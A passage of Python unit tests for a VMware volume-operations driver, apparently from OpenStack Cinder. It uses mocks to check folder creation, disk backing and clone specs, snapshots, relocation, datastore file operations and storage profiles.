child_entity_2 = mock.Mock(spec=object)
child_entity_2._type = 'Folder'
child_entity_2_name = child_name
prop_val.ManagedObjectReference = [child_entity_1, child_entity_2]
self.session.invoke_api.side_effect = [prop_val, child_entity_1_name,
child_entity_2_name]
ret = self.vops.create_folder(parent_folder, child_name)
self.assertEqual(child_entity_2, ret)
expected_invoke_api = [mock.call(vim_util, 'get_object_property',
self.session.vim, parent_folder,
'childEntity'),
mock.call(vim_util, 'get_object_property',
self.session.vim, child_entity_1,
'name'),
mock.call(vim_util, 'get_object_property',
self.session.vim, child_entity_2,
'name')]
self.assertEqual(expected_invoke_api,
self.session.invoke_api.mock_calls)
# Clear side effects.
self.session.invoke_api.side_effect = None
def test_create_folder_with_special_characters(self):
"""Test create_folder with names containing special characters."""
# Test folder already exists case.
child_entity_1 = mock.Mock(_type='Folder')
child_entity_1_name = 'cinder-volumes'
child_entity_2 = mock.Mock(_type='Folder')
child_entity_2_name = '%2fcinder-volumes'
prop_val = mock.Mock(ManagedObjectReference=[child_entity_1,
child_entity_2])
self.session.invoke_api.side_effect = [prop_val,
child_entity_1_name,
child_entity_2_name]
parent_folder = mock.sentinel.parent_folder
child_name = '/cinder-volumes'
ret = self.vops.create_folder(parent_folder, child_name)
self.assertEqual(child_entity_2, ret)
# Test non-existing folder case.
child_entity_2_name = '%25%25cinder-volumes'
new_child_folder = mock.sentinel.new_child_folder
self.session.invoke_api.side_effect = [prop_val,
child_entity_1_name,
child_entity_2_name,
new_child_folder]
child_name = '%cinder-volumes'
ret = self.vops.create_folder(parent_folder, child_name)
self.assertEqual(new_child_folder, ret)
self.session.invoke_api.assert_called_with(self.session.vim,
'CreateFolder',
parent_folder,
name=child_name)
# Reset side effects.
self.session.invoke_api.side_effect = None
def test_create_disk_backing_thin(self):
backing = mock.Mock()
del backing.eagerlyScrub
cf = self.session.vim.client.factory
cf.create.return_value = backing
disk_type = 'thin'
ret = self.vops._create_disk_backing(disk_type, None)
self.assertEqual(backing, ret)
self.assertIsInstance(ret.thinProvisioned, bool)
self.assertTrue(ret.thinProvisioned)
self.assertEqual('', ret.fileName)
self.assertEqual('persistent', ret.diskMode)
def test_create_disk_backing_thick(self):
backing = mock.Mock()
del backing.eagerlyScrub
del backing.thinProvisioned
cf = self.session.vim.client.factory
cf.create.return_value = backing
disk_type = 'thick'
ret = self.vops._create_disk_backing(disk_type, None)
self.assertEqual(backing, ret)
self.assertEqual('', ret.fileName)
self.assertEqual('persistent', ret.diskMode)
def test_create_disk_backing_eager_zeroed_thick(self):
backing = mock.Mock()
del backing.thinProvisioned
cf = self.session.vim.client.factory
cf.create.return_value = backing
disk_type = 'eagerZeroedThick'
ret = self.vops._create_disk_backing(disk_type, None)
self.assertEqual(backing, ret)
self.assertIsInstance(ret.eagerlyScrub, bool)
self.assertTrue(ret.eagerlyScrub)
self.assertEqual('', ret.fileName)
self.assertEqual('persistent', ret.diskMode)
def test_create_virtual_disk_config_spec(self):
cf = self.session.vim.client.factory
cf.create.side_effect = lambda *args: mock.Mock()
size_kb = units.Ki
controller_key = 200
disk_type = 'thick'
spec = self.vops._create_virtual_disk_config_spec(size_kb,
disk_type,
controller_key,
None)
cf.create.side_effect = None
self.assertEqual('add', spec.operation)
self.assertEqual('create', spec.fileOperation)
device = spec.device
self.assertEqual(size_kb, device.capacityInKB)
self.assertEqual(-101, device.key)
self.assertEqual(0, device.unitNumber)
self.assertEqual(controller_key, device.controllerKey)
backing = device.backing
self.assertEqual('', backing.fileName)
self.assertEqual('persistent', backing.diskMode)
def test_create_specs_for_ide_disk_add(self):
factory = self.session.vim.client.factory
factory.create.side_effect = lambda *args: mock.Mock()
size_kb = 1
disk_type = 'thin'
adapter_type = 'ide'
ret = self.vops._create_specs_for_disk_add(size_kb, disk_type,
adapter_type)
factory.create.side_effect = None
self.assertEqual(1, len(ret))
self.assertEqual(units.Ki, ret[0].device.capacityInKB)
self.assertEqual(200, ret[0].device.controllerKey)
expected = [mock.call.create('ns0:VirtualDeviceConfigSpec'),
mock.call.create('ns0:VirtualDisk'),
mock.call.create('ns0:VirtualDiskFlatVer2BackingInfo')]
factory.create.assert_has_calls(expected, any_order=True)
def test_create_specs_for_scsi_disk_add(self):
factory = self.session.vim.client.factory
factory.create.side_effect = lambda *args: mock.Mock()
size_kb = 2 * units.Ki
disk_type = 'thin'
adapter_type = 'lsiLogicsas'
ret = self.vops._create_specs_for_disk_add(size_kb, disk_type,
adapter_type)
factory.create.side_effect = None
self.assertEqual(2, len(ret))
self.assertEqual('noSharing', ret[1].device.sharedBus)
self.assertEqual(size_kb, ret[0].device.capacityInKB)
expected = [mock.call.create('ns0:VirtualLsiLogicSASController'),
mock.call.create('ns0:VirtualDeviceConfigSpec'),
mock.call.create('ns0:VirtualDisk'),
mock.call.create('ns0:VirtualDiskFlatVer2BackingInfo'),
mock.call.create('ns0:VirtualDeviceConfigSpec')]
factory.create.assert_has_calls(expected, any_order=True)
def test_get_create_spec_disk_less(self):
factory = self.session.vim.client.factory
factory.create.side_effect = lambda *args: mock.Mock()
name = mock.sentinel.name
ds_name = mock.sentinel.ds_name
profile_id = mock.sentinel.profile_id
ret = self.vops._get_create_spec_disk_less(name, ds_name, profile_id)
factory.create.side_effect = None
self.assertEqual(name, ret.name)
self.assertEqual('[%s]' % ds_name, ret.files.vmPathName)
self.assertEqual("vmx-08", ret.version)
self.assertEqual(profile_id, ret.vmProfile[0].profileId)
expected = [mock.call.create('ns0:VirtualMachineFileInfo'),
mock.call.create('ns0:VirtualMachineConfigSpec'),
mock.call.create('ns0:VirtualMachineDefinedProfileSpec')]
factory.create.assert_has_calls(expected, any_order=True)
@mock.patch('cinder.volume.drivers.vmware.volumeops.VMwareVolumeOps.'
'get_create_spec')
def test_create_backing(self, get_create_spec):
create_spec = mock.sentinel.create_spec
get_create_spec.return_value = create_spec
task = mock.sentinel.task
self.session.invoke_api.return_value = task
task_info = mock.Mock(spec=object)
task_info.result = mock.sentinel.result
self.session.wait_for_task.return_value = task_info
name = 'backing_name'
size_kb = mock.sentinel.size_kb
disk_type = mock.sentinel.disk_type
adapter_type = mock.sentinel.adapter_type
folder = mock.sentinel.folder
resource_pool = mock.sentinel.resource_pool
host = mock.sentinel.host
ds_name = mock.sentinel.ds_name
profile_id = mock.sentinel.profile_id
ret = self.vops.create_backing(name, size_kb, disk_type, folder,
resource_pool, host, ds_name,
profile_id, adapter_type)
self.assertEqual(mock.sentinel.result, ret)
get_create_spec.assert_called_once_with(name, size_kb, disk_type,
ds_name, profile_id,
adapter_type)
self.session.invoke_api.assert_called_once_with(self.session.vim,
'CreateVM_Task',
folder,
config=create_spec,
pool=resource_pool,
host=host)
self.session.wait_for_task.assert_called_once_with(task)
@mock.patch('cinder.volume.drivers.vmware.volumeops.VMwareVolumeOps.'
'_get_create_spec_disk_less')
def test_create_backing_disk_less(self, get_create_spec_disk_less):
create_spec = mock.sentinel.create_spec
get_create_spec_disk_less.return_value = create_spec
task = mock.sentinel.task
self.session.invoke_api.return_value = task
task_info = mock.Mock(spec=object)
task_info.result = mock.sentinel.result
self.session.wait_for_task.return_value = task_info
name = 'backing_name'
folder = mock.sentinel.folder
resource_pool = mock.sentinel.resource_pool
host = mock.sentinel.host
ds_name = mock.sentinel.ds_name
profile_id = mock.sentinel.profile_id
ret = self.vops.create_backing_disk_less(name, folder, resource_pool,
host, ds_name, profile_id)
self.assertEqual(mock.sentinel.result, ret)
get_create_spec_disk_less.assert_called_once_with(name, ds_name,
profile_id)
self.session.invoke_api.assert_called_once_with(self.session.vim,
'CreateVM_Task',
folder,
config=create_spec,
pool=resource_pool,
host=host)
self.session.wait_for_task.assert_called_once_with(task)
def test_get_datastore(self):
backing = mock.sentinel.backing
datastore = mock.Mock(spec=object)
datastore.ManagedObjectReference = [mock.sentinel.ds]
self.session.invoke_api.return_value = datastore
ret = self.vops.get_datastore(backing)
self.assertEqual(mock.sentinel.ds, ret)
self.session.invoke_api.assert_called_once_with(vim_util,
'get_object_property',
self.session.vim,
backing, 'datastore')
def test_get_summary(self):
datastore = mock.sentinel.datastore
summary = mock.sentinel.summary
self.session.invoke_api.return_value = summary
ret = self.vops.get_summary(datastore)
self.assertEqual(summary, ret)
self.session.invoke_api.assert_called_once_with(vim_util,
'get_object_property',
self.session.vim,
datastore,
'summary')
def test_get_relocate_spec(self):
delete_disk_attribute = True
def _create_side_effect(type):
obj = mock.Mock()
if type == "ns0:VirtualDiskFlatVer2BackingInfo":
del obj.eagerlyScrub
elif (type == "ns0:VirtualMachineRelocateSpec" and
delete_disk_attribute):
del obj.disk
else:
pass
return obj
factory = self.session.vim.client.factory
factory.create.side_effect = _create_side_effect
datastore = mock.sentinel.datastore
resource_pool = mock.sentinel.resource_pool
host = mock.sentinel.host
disk_move_type = mock.sentinel.disk_move_type
ret = self.vops._get_relocate_spec(datastore, resource_pool, host,
disk_move_type)
self.assertEqual(datastore, ret.datastore)
self.assertEqual(resource_pool, ret.pool)
self.assertEqual(host, ret.host)
self.assertEqual(disk_move_type, ret.diskMoveType)
# Test with disk locator.
delete_disk_attribute = False
disk_type = 'thin'
disk_device = mock.Mock()
ret = self.vops._get_relocate_spec(datastore, resource_pool, host,
disk_move_type, disk_type,
disk_device)
factory.create.side_effect = None
self.assertEqual(datastore, ret.datastore)
self.assertEqual(resource_pool, ret.pool)
self.assertEqual(host, ret.host)
self.assertEqual(disk_move_type, ret.diskMoveType)
self.assertIsInstance(ret.disk, list)
self.assertEqual(1, len(ret.disk))
disk_locator = ret.disk[0]
self.assertEqual(datastore, disk_locator.datastore)
self.assertEqual(disk_device.key, disk_locator.diskId)
backing = disk_locator.diskBackingInfo
self.assertIsInstance(backing.thinProvisioned, bool)
self.assertTrue(backing.thinProvisioned)
self.assertEqual('', backing.fileName)
self.assertEqual('persistent', backing.diskMode)
@mock.patch('cinder.volume.drivers.vmware.volumeops.VMwareVolumeOps.'
'_get_disk_device')
@mock.patch('cinder.volume.drivers.vmware.volumeops.VMwareVolumeOps.'
'_get_relocate_spec')
def test_relocate_backing(self, get_relocate_spec, get_disk_device):
disk_device = mock.sentinel.disk_device
get_disk_device.return_value = disk_device
spec = mock.sentinel.relocate_spec
get_relocate_spec.return_value = spec
task = mock.sentinel.task
self.session.invoke_api.return_value = task
backing = mock.sentinel.backing
datastore = mock.sentinel.datastore
resource_pool = mock.sentinel.resource_pool
host = mock.sentinel.host
disk_type = mock.sentinel.disk_type
self.vops.relocate_backing(backing, datastore, resource_pool, host,
disk_type)
# Verify calls
disk_move_type = 'moveAllDiskBackingsAndAllowSharing'
get_disk_device.assert_called_once_with(backing)
get_relocate_spec.assert_called_once_with(datastore, resource_pool,
host, disk_move_type,
disk_type, disk_device)
self.session.invoke_api.assert_called_once_with(self.session.vim,
'RelocateVM_Task',
backing,
spec=spec)
self.session.wait_for_task.assert_called_once_with(task)
def test_move_backing_to_folder(self):
task = mock.sentinel.task
self.session.invoke_api.return_value = task
backing = mock.sentinel.backing
folder = mock.sentinel.folder
self.vops.move_backing_to_folder(backing, folder)
# Verify calls
self.session.invoke_api.assert_called_once_with(self.session.vim,
'MoveIntoFolder_Task',
folder,
list=[backing])
self.session.wait_for_task.assert_called_once_with(task)
def test_create_snapshot_operation(self):
task = mock.sentinel.task
self.session.invoke_api.return_value = task
task_info = mock.Mock(spec=object)
task_info.result = mock.sentinel.result
self.session.wait_for_task.return_value = task_info
backing = mock.sentinel.backing
name = mock.sentinel.name
desc = mock.sentinel.description
quiesce = True
ret = self.vops.create_snapshot(backing, name, desc, quiesce)
self.assertEqual(mock.sentinel.result, ret)
self.session.invoke_api.assert_called_once_with(self.session.vim,
'CreateSnapshot_Task',
backing, name=name,
description=desc,
memory=False,
quiesce=quiesce)
self.session.wait_for_task.assert_called_once_with(task)
def test_get_snapshot_from_tree(self):
volops = volumeops.VMwareVolumeOps
name = mock.sentinel.name
# Test snapshot == 'None'
ret = volops._get_snapshot_from_tree(name, None)
self.assertIsNone(ret)
# Test root == snapshot
snapshot = mock.sentinel.snapshot
node = mock.Mock(spec=object)
node.name = name
node.snapshot = snapshot
ret = volops._get_snapshot_from_tree(name, node)
self.assertEqual(ret, snapshot)
# Test root.childSnapshotList == None
root = mock.Mock(spec=object)
root.name = 'root'
del root.childSnapshotList
ret = volops._get_snapshot_from_tree(name, root)
self.assertIsNone(ret)
# Test root.child == snapshot
root.childSnapshotList = [node]
ret = volops._get_snapshot_from_tree(name, root)
self.assertEqual(ret, snapshot)
def test_get_snapshot(self):
# build out the root snapshot tree
snapshot_name = mock.sentinel.snapshot_name
snapshot = mock.sentinel.snapshot
root = mock.Mock(spec=object)
root.name = 'root'
node = mock.Mock(spec=object)
node.name = snapshot_name
node.snapshot = snapshot
root.childSnapshotList = [node]
# Test rootSnapshotList is not None
snapshot_tree = mock.Mock(spec=object)
snapshot_tree.rootSnapshotList = [root]
self.session.invoke_api.return_value = snapshot_tree
backing = mock.sentinel.backing
ret = self.vops.get_snapshot(backing, snapshot_name)
self.assertEqual(snapshot, ret)
self.session.invoke_api.assert_called_with(vim_util,
'get_object_property',
self.session.vim,
backing,
'snapshot')
# Test rootSnapshotList == None
snapshot_tree.rootSnapshotList = None
ret = self.vops.get_snapshot(backing, snapshot_name)
self.assertIsNone(ret)
self.session.invoke_api.assert_called_with(vim_util,
'get_object_property',
self.session.vim,
backing,
'snapshot')
def test_snapshot_exists(self):
backing = mock.sentinel.backing
invoke_api = self.session.invoke_api
invoke_api.return_value = None
self.assertFalse(self.vops.snapshot_exists(backing))
invoke_api.assert_called_once_with(vim_util,
'get_object_property',
self.session.vim,
backing,
'snapshot')
snapshot = mock.Mock()
invoke_api.return_value = snapshot
snapshot.rootSnapshotList = None
self.assertFalse(self.vops.snapshot_exists(backing))
snapshot.rootSnapshotList = [mock.Mock()]
self.assertTrue(self.vops.snapshot_exists(backing))
def test_delete_snapshot(self):
backing = mock.sentinel.backing
snapshot_name = mock.sentinel.snapshot_name
# Test snapshot is None
with mock.patch.object(self.vops, 'get_snapshot') as get_snapshot:
get_snapshot.return_value = None
self.vops.delete_snapshot(backing, snapshot_name)
get_snapshot.assert_called_once_with(backing, snapshot_name)
# Test snapshot is not None
snapshot = mock.sentinel.snapshot
task = mock.sentinel.task
invoke_api = self.session.invoke_api
invoke_api.return_value = task
with mock.patch.object(self.vops, 'get_snapshot') as get_snapshot:
get_snapshot.return_value = snapshot
self.vops.delete_snapshot(backing, snapshot_name)
get_snapshot.assert_called_with(backing, snapshot_name)
invoke_api.assert_called_once_with(self.session.vim,
'RemoveSnapshot_Task',
snapshot, removeChildren=False)
self.session.wait_for_task.assert_called_once_with(task)
def test_get_folder(self):
folder = mock.sentinel.folder
backing = mock.sentinel.backing
with mock.patch.object(self.vops, '_get_parent') as get_parent:
get_parent.return_value = folder
ret = self.vops._get_folder(backing)
self.assertEqual(folder, ret)
get_parent.assert_called_once_with(backing, 'Folder')
@mock.patch('cinder.volume.drivers.vmware.volumeops.VMwareVolumeOps.'
'_get_relocate_spec')
@mock.patch('cinder.volume.drivers.vmware.volumeops.VMwareVolumeOps.'
'_get_disk_device')
def test_get_clone_spec(self, get_disk_device, get_relocate_spec):
factory = self.session.vim.client.factory
factory.create.side_effect = lambda *args: mock.Mock()
relocate_spec = mock.sentinel.relocate_spec
get_relocate_spec.return_value = relocate_spec
datastore = mock.sentinel.datastore
disk_move_type = mock.sentinel.disk_move_type
snapshot = mock.sentinel.snapshot
disk_type = None
backing = mock.sentinel.backing
ret = self.vops._get_clone_spec(datastore, disk_move_type, snapshot,
backing, disk_type)
self.assertEqual(relocate_spec, ret.location)
self.assertFalse(ret.powerOn)
self.assertFalse(ret.template)
self.assertEqual(snapshot, ret.snapshot)
get_relocate_spec.assert_called_once_with(datastore, None, None,
disk_move_type, disk_type,
None)
disk_device = mock.sentinel.disk_device
get_disk_device.return_value = disk_device
disk_type = 'thin'
ret = self.vops._get_clone_spec(datastore, disk_move_type, snapshot,
backing, disk_type)
factory.create.side_effect = None
self.assertEqual(relocate_spec, ret.location)
self.assertFalse(ret.powerOn)
self.assertFalse(ret.template)
self.assertEqual(snapshot, ret.snapshot)
get_disk_device.assert_called_once_with(backing)
get_relocate_spec.assert_called_with(datastore, None, None,
disk_move_type, disk_type,
disk_device)
@mock.patch('cinder.volume.drivers.vmware.volumeops.VMwareVolumeOps.'
'_get_clone_spec')
def test_clone_backing(self, get_clone_spec):
folder = mock.Mock(name='folder', spec=object)
folder._type = 'Folder'
task = mock.sentinel.task
self.session.invoke_api.side_effect = [folder, task, folder, task,
folder, task]
task_info = mock.Mock(spec=object)
task_info.result = mock.sentinel.new_backing
self.session.wait_for_task.return_value = task_info
clone_spec = mock.sentinel.clone_spec
get_clone_spec.return_value = clone_spec
# Test non-linked clone_backing
name = mock.sentinel.name
backing = mock.Mock(spec=object)
backing._type = 'VirtualMachine'
snapshot = mock.sentinel.snapshot
clone_type = "anything-other-than-linked"
datastore = mock.sentinel.datstore
ret = self.vops.clone_backing(name, backing, snapshot, clone_type,
datastore)
# verify calls
self.assertEqual(mock.sentinel.new_backing, ret)
disk_move_type = 'moveAllDiskBackingsAndDisallowSharing'
get_clone_spec.assert_called_with(datastore, disk_move_type, snapshot,
backing, None, None, None)
expected = [mock.call(vim_util, 'get_object_property',
self.session.vim, backing, 'parent'),
mock.call(self.session.vim, 'CloneVM_Task', backing,
folder=folder, name=name, spec=clone_spec)]
self.assertEqual(expected, self.session.invoke_api.mock_calls)
# Test linked clone_backing
clone_type = volumeops.LINKED_CLONE_TYPE
self.session.invoke_api.reset_mock()
ret = self.vops.clone_backing(name, backing, snapshot, clone_type,
datastore)
# verify calls
self.assertEqual(mock.sentinel.new_backing, ret)
disk_move_type = 'createNewChildDiskBacking'
get_clone_spec.assert_called_with(datastore, disk_move_type, snapshot,
backing, None, None, None)
expected = [mock.call(vim_util, 'get_object_property',
self.session.vim, backing, 'parent'),
mock.call(self.session.vim, 'CloneVM_Task', backing,
folder=folder, name=name, spec=clone_spec)]
self.assertEqual(expected, self.session.invoke_api.mock_calls)
# Test disk type conversion and target host.
clone_type = None
disk_type = 'thin'
host = mock.sentinel.host
rp = mock.sentinel.rp
self.session.invoke_api.reset_mock()
ret = self.vops.clone_backing(name, backing, snapshot, clone_type,
datastore, disk_type, host, rp)
self.assertEqual(mock.sentinel.new_backing, ret)
disk_move_type = 'moveAllDiskBackingsAndDisallowSharing'
get_clone_spec.assert_called_with(datastore, disk_move_type, snapshot,
backing, disk_type, host, rp)
expected = [mock.call(vim_util, 'get_object_property',
self.session.vim, backing, 'parent'),
mock.call(self.session.vim, 'CloneVM_Task', backing,
folder=folder, name=name, spec=clone_spec)]
self.assertEqual(expected, self.session.invoke_api.mock_calls)
# Clear side effects.
self.session.invoke_api.side_effect = None
@mock.patch('cinder.volume.drivers.vmware.volumeops.VMwareVolumeOps.'
'_create_specs_for_disk_add')
def test_attach_disk_to_backing(self, create_spec):
reconfig_spec = mock.Mock()
self.session.vim.client.factory.create.return_value = reconfig_spec
disk_add_config_specs = mock.Mock()
create_spec.return_value = disk_add_config_specs
task = mock.Mock()
self.session.invoke_api.return_value = task
backing = mock.Mock()
size_in_kb = units.Ki
disk_type = "thin"
adapter_type = "ide"
vmdk_ds_file_path = mock.Mock()
self.vops.attach_disk_to_backing(backing, size_in_kb, disk_type,
adapter_type, vmdk_ds_file_path)
self.assertEqual(disk_add_config_specs, reconfig_spec.deviceChange)
create_spec.assert_called_once_with(size_in_kb, disk_type,
adapter_type,
vmdk_ds_file_path)
self.session.invoke_api.assert_called_once_with(self.session.vim,
"ReconfigVM_Task",
backing,
spec=reconfig_spec)
self.session.wait_for_task.assert_called_once_with(task)
def test_rename_backing(self):
task = mock.sentinel.task
self.session.invoke_api.return_value = task
backing = mock.sentinel.backing
new_name = mock.sentinel.new_name
self.vops.rename_backing(backing, new_name)
self.session.invoke_api.assert_called_once_with(self.session.vim,
"Rename_Task",
backing,
newName=new_name)
self.session.wait_for_task.assert_called_once_with(task)
def test_change_backing_profile(self):
# Test change to empty profile.
reconfig_spec = mock.Mock()
empty_profile_spec = mock.sentinel.empty_profile_spec
self.session.vim.client.factory.create.side_effect = [
reconfig_spec, empty_profile_spec]
task = mock.sentinel.task
self.session.invoke_api.return_value = task
backing = mock.sentinel.backing
unique_profile_id = mock.sentinel.unique_profile_id
profile_id = mock.Mock(uniqueId=unique_profile_id)
self.vops.change_backing_profile(backing, profile_id)
self.assertEqual([empty_profile_spec], reconfig_spec.vmProfile)
self.session.invoke_api.assert_called_once_with(self.session.vim,
"ReconfigVM_Task",
backing,
spec=reconfig_spec)
self.session.wait_for_task.assert_called_once_with(task)
# Test change to non-empty profile.
profile_spec = mock.Mock()
self.session.vim.client.factory.create.side_effect = [
reconfig_spec, profile_spec]
self.session.invoke_api.reset_mock()
self.session.wait_for_task.reset_mock()
self.vops.change_backing_profile(backing, profile_id)
self.assertEqual([profile_spec], reconfig_spec.vmProfile)
self.assertEqual(unique_profile_id,
reconfig_spec.vmProfile[0].profileId)
self.session.invoke_api.assert_called_once_with(self.session.vim,
"ReconfigVM_Task",
backing,
spec=reconfig_spec)
self.session.wait_for_task.assert_called_once_with(task)
# Clear side effects.
self.session.vim.client.factory.create.side_effect = None
def test_delete_file(self):
file_mgr = mock.sentinel.file_manager
self.session.vim.service_content.fileManager = file_mgr
task = mock.sentinel.task
invoke_api = self.session.invoke_api
invoke_api.return_value = task
# Test delete file
file_path = mock.sentinel.file_path
datacenter = mock.sentinel.datacenter
self.vops.delete_file(file_path, datacenter)
# verify calls
invoke_api.assert_called_once_with(self.session.vim,
'DeleteDatastoreFile_Task',
file_mgr,
name=file_path,
datacenter=datacenter)
self.session.wait_for_task.assert_called_once_with(task)
def test_create_datastore_folder(self):
file_manager = mock.sentinel.file_manager
self.session.vim.service_content.fileManager = file_manager
invoke_api = self.session.invoke_api
ds_name = "nfs"
folder_path = "test/"
datacenter = mock.sentinel.datacenter
self.vops.create_datastore_folder(ds_name, folder_path, datacenter)
invoke_api.assert_called_once_with(self.session.vim,
'MakeDirectory',
file_manager,
name="[nfs] test/",
datacenter=datacenter)
def test_create_datastore_folder_with_existing_folder(self):
file_manager = mock.sentinel.file_manager
self.session.vim.service_content.fileManager = file_manager
invoke_api = self.session.invoke_api
invoke_api.side_effect = exceptions.FileAlreadyExistsException
ds_name = "nfs"
folder_path = "test/"
datacenter = mock.sentinel.datacenter
self.vops.create_datastore_folder(ds_name, folder_path, datacenter)
invoke_api.assert_called_once_with(self.session.vim,
'MakeDirectory',
file_manager,
name="[nfs] test/",
datacenter=datacenter)
invoke_api.side_effect = None
def test_create_datastore_folder_with_invoke_api_error(self):
file_manager = mock.sentinel.file_manager
self.session.vim.service_content.fileManager = file_manager
invoke_api = self.session.invoke_api
invoke_api.side_effect = exceptions.VimFaultException(
["FileFault"], "error")
ds_name = "nfs"
folder_path = "test/"
datacenter = mock.sentinel.datacenter
self.assertRaises(exceptions.VimFaultException,
self.vops.create_datastore_folder,
ds_name,
folder_path,
datacenter)
invoke_api.assert_called_once_with(self.session.vim,
'MakeDirectory',
file_manager,
name="[nfs] test/",
datacenter=datacenter)
invoke_api.side_effect = None
def test_get_path_name(self):
path = mock.Mock(spec=object)
path_name = mock.sentinel.vm_path_name
path.vmPathName = path_name
invoke_api = self.session.invoke_api
invoke_api.return_value = path
backing = mock.sentinel.backing
ret = self.vops.get_path_name(backing)
self.assertEqual(path_name, ret)
invoke_api.assert_called_once_with(vim_util, 'get_object_property',
self.session.vim, backing,
'config.files')
def test_get_entity_name(self):
entity_name = mock.sentinel.entity_name
invoke_api = self.session.invoke_api
invoke_api.return_value = entity_name
entity = mock.sentinel.entity
ret = self.vops.get_entity_name(entity)
self.assertEqual(entity_name, ret)
invoke_api.assert_called_once_with(vim_util, 'get_object_property',
self.session.vim, entity, 'name')
def test_get_vmdk_path(self):
# Setup hardware_devices for test
device = mock.Mock()
device.__class__.__name__ = 'VirtualDisk'
backing = mock.Mock()
backing.__class__.__name__ = 'VirtualDiskFlatVer2BackingInfo'
backing.fileName = mock.sentinel.vmdk_path
device.backing = backing
invoke_api = self.session.invoke_api
invoke_api.return_value = [device]
# Test get_vmdk_path
ret = self.vops.get_vmdk_path(backing)
self.assertEqual(mock.sentinel.vmdk_path, ret)
invoke_api.assert_called_once_with(vim_util, 'get_object_property',
self.session.vim, backing,
'config.hardware.device')
backing.__class__.__name__ = ' VirtualDiskSparseVer2BackingInfo'
self.assertRaises(AssertionError, self.vops.get_vmdk_path, backing)
# Test with no disk device.
invoke_api.return_value = []
self.assertRaises(vmdk_exceptions.VirtualDiskNotFoundException,
self.vops.get_vmdk_path,
backing)
def test_get_disk_size(self):
# Test with valid disk device.
device = mock.Mock()
device.__class__.__name__ = 'VirtualDisk'
disk_size_bytes = 1024
device.capacityInKB = disk_size_bytes / units.Ki
invoke_api = self.session.invoke_api
invoke_api.return_value = [device]
self.assertEqual(disk_size_bytes,
self.vops.get_disk_size(mock.sentinel.backing))
# Test with no disk device.
invoke_api.return_value = []
self.assertRaises(vmdk_exceptions.VirtualDiskNotFoundException,
self.vops.get_disk_size,
mock.sentinel.backing)
def test_create_virtual_disk(self):
task = mock.Mock()
invoke_api = self.session.invoke_api
invoke_api.return_value = task
spec = mock.Mock()
factory = self.session.vim.client.factory
factory.create.return_value = spec
disk_mgr = self.session.vim.service_content.virtualDiskManager
dc_ref = mock.Mock()
vmdk_ds_file_path = mock.Mock()
size_in_kb = 1024
adapter_type = 'ide'
disk_type = 'thick'
self.vops.create_virtual_disk(dc_ref, vmdk_ds_file_path, size_in_kb,
adapter_type, disk_type)
self.assertEqual(volumeops.VirtualDiskAdapterType.IDE,
spec.adapterType)
self.assertEqual(volumeops.VirtualDiskType.PREALLOCATED, spec.diskType)
self.assertEqual(size_in_kb, spec.capacityKb)
invoke_api.assert_called_once_with(self.session.vim,
'CreateVirtualDisk_Task',
disk_mgr,
name=vmdk_ds_file_path,
datacenter=dc_ref,
spec=spec)
self.session.wait_for_task.assert_called_once_with(task)
@mock.patch('cinder.volume.drivers.vmware.volumeops.VMwareVolumeOps.'
'create_virtual_disk')
@mock.patch('cinder.volume.drivers.vmware.volumeops.VMwareVolumeOps.'
'delete_file')
def test_create_flat_extent_virtual_disk_descriptor(self, delete_file,
create_virtual_disk):
dc_ref = mock.Mock()
path = mock.Mock()
size_in_kb = 1024
adapter_type = 'ide'
disk_type = 'thick'
self.vops.create_flat_extent_virtual_disk_descriptor(dc_ref,
path,
size_in_kb,
adapter_type,
disk_type)
create_virtual_disk.assert_called_once_with(
dc_ref, path.get_descriptor_ds_file_path(), size_in_kb,
adapter_type, disk_type)
delete_file.assert_called_once_with(
path.get_flat_extent_ds_file_path(), dc_ref)
def test_copy_vmdk_file(self):
task = mock.sentinel.task
invoke_api = self.session.invoke_api
invoke_api.return_value = task
disk_mgr = self.session.vim.service_content.virtualDiskManager
src_dc_ref = mock.sentinel.src_dc_ref
src_vmdk_file_path = mock.sentinel.src_vmdk_file_path
dest_dc_ref = mock.sentinel.dest_dc_ref
dest_vmdk_file_path = mock.sentinel.dest_vmdk_file_path
self.vops.copy_vmdk_file(src_dc_ref, src_vmdk_file_path,
dest_vmdk_file_path, dest_dc_ref)
invoke_api.assert_called_once_with(self.session.vim,
'CopyVirtualDisk_Task',
disk_mgr,
sourceName=src_vmdk_file_path,
sourceDatacenter=src_dc_ref,
destName=dest_vmdk_file_path,
destDatacenter=dest_dc_ref,
force=True)
self.session.wait_for_task.assert_called_once_with(task)
def test_copy_vmdk_file_with_default_dest_datacenter(self):
task = mock.sentinel.task
invoke_api = self.session.invoke_api
invoke_api.return_value = task
disk_mgr = self.session.vim.service_content.virtualDiskManager
src_dc_ref = mock.sentinel.src_dc_ref
src_vmdk_file_path = mock.sentinel.src_vmdk_file_path
dest_vmdk_file_path = mock.sentinel.dest_vmdk_file_path
self.vops.copy_vmdk_file(src_dc_ref, src_vmdk_file_path,
dest_vmdk_file_path)
invoke_api.assert_called_once_with(self.session.vim,
'CopyVirtualDisk_Task',
disk_mgr,
sourceName=src_vmdk_file_path,
sourceDatacenter=src_dc_ref,
destName=dest_vmdk_file_path,
destDatacenter=src_dc_ref,
force=True)
self.session.wait_for_task.assert_called_once_with(task)
def test_delete_vmdk_file(self):
task = mock.sentinel.task
invoke_api = self.session.invoke_api
invoke_api.return_value = task
disk_mgr = self.session.vim.service_content.virtualDiskManager
dc_ref = self.session.dc_ref
vmdk_file_path = self.session.vmdk_file
self.vops.delete_vmdk_file(vmdk_file_path, dc_ref)
invoke_api.assert_called_once_with(self.session.vim,
'DeleteVirtualDisk_Task',
disk_mgr,
name=vmdk_file_path,
datacenter=dc_ref)
self.session.wait_for_task.assert_called_once_with(task)
def test_get_profile(self):
server_obj = mock.Mock()
self.session.pbm.client.factory.create.return_value = server_obj
profile_ids = [mock.sentinel.profile_id]
profile_name = mock.sentinel.profile_name
profile = mock.Mock()
profile.name = profile_name
self.session.invoke_api.side_effect = [profile_ids, [profile]]
value = mock.sentinel.value
backing = mock.Mock(value=value)
self.assertEqual(profile_name, self.vops.get_profile(backing))
pbm = self.session.pbm
profile_manager = pbm.service_content.profileManager
exp_calls = [mock.call(pbm, 'PbmQueryAssociatedProfile',
profile_manager, entity=server_obj),
mock.call(pbm, 'PbmRetrieveContent', profile_manager,
profileIds=profile_ids)]
self.assertEqual(exp_calls, self.session.invoke_api.call_args_list)
self.assertEqual(value, server_obj.key)
self.assertEqual('virtualMachine', server_obj.objectType)
self.session.invoke_api.side_effect = None
def test_get_profile_with_no_profile(self):
server_obj = mock.Mock()
self.session.pbm.client.factory.create.return_value = server_obj
self.session.invoke_api.side_effect = [[]]
